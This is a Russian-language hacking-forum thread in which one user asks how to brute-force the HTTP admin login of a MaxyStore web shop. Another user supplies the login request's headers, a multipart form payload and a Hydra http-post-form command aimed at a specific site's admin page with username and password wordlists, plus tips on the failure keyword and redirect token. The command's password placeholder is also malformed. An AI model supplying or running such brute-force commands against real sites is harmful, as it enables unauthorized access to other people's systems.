ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Гидра и Http-форма (https://forum.antichat.xyz/showthread.php?t=424188)

BUTUZ 14.04.2015 22:10
Подскажите пожалуйста, какая должна быть команда для брута http-админки MaxyStore?

lifescore 15.04.2015 09:14
Цитата:
Сообщение от BUTUZ

Подскажите пожалуйста, какая должна быть команда для брута http-админки MaxyStore?
Код:
HEADERS

Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
User-Agent: runscope/0.1

QUERYSTRING
route: common/login

PARAMETERS
password: demo
username: demo

BODY
username=demo&password=demo
Вообще там Content-Type: multipart/form-data

Payload должен выглядеть как-то так

Код:
------WebKitFormBoundarypeTHmaEyYDJ1cZXG
Content-Disposition: form-data; name="username"

demo
------WebKitFormBoundarypeTHmaEyYDJ1cZXG
Content-Disposition: form-data; name="password"

demo
------WebKitFormBoundarypeTHmaEyYDJ1cZXG--
хз гидры нет под рукой, да и никогда небыло) нупримерно так по FAQ попробуй

Код:
$ hydra -L "logins path" -P "pass.txt path" http://2011.maxystore.ru/admin/index.php http-post-form "route=common/login:username=^USER^&password=^PASS:alert-danger"
p.s. alert-danger - invalid keyword (хз как в гидре, я указал кейворд тега.. ибо plain text там на русском весь, а юникод консоли не любят)

p.s.s. не забывай про редирект после отправки данных формы, и с редиректом выдается токен

p.s.s.s. почему именно гидра ?....


Время: 18:44